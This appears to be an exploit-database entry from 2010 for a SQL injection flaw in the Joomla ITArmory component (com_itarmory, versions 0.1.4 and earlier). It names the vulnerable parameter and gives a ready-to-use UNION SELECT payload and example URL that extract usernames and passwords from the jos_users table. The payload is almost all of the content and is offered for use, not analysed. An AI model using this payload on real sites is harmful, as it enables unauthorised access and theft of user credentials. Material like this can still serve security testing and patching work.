Joomla ITArmory Component (com_itarmory) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla ITArmory Component (com_itarmory) SQL Injection Vulnerability
# Published : 2010-07-24
# Author : Craw
# Previous Title : XAOS CMS SQL Injection Vulnerability
# Next Title : Joomla Component (com_youtube) SQL Injection Vulnerability

# Author: Craw
# Email: craw@element7.eu              
# Software Link: http://www.intherapy.eu/index.php/itarmory-component/category/3-component
# Version: <=0.1.4
# Category: webapplications

=======================================================

[+] Vulnerable File :

 http://www.site.com/index.php?option=com_itarmory&view=guildmembers&Itemid=[SQL]

 
[+] ExploiT :

 ?filter_search=&filter_level=1&filter_race=*&filter_class=8+and+1=2+union+all+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+from+jos_users--+

 
[+] Example :

 http://www.site.com/index.php?option=com_itarmory&view=guildmembers&Itemid=?filter_search=&filter_level=1&filter_race=*&filter_class=8+and+1=2+union+all+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+from+jos_users--+

 

=======================================================
Greetz @ LUXEMBOURG
=======================================================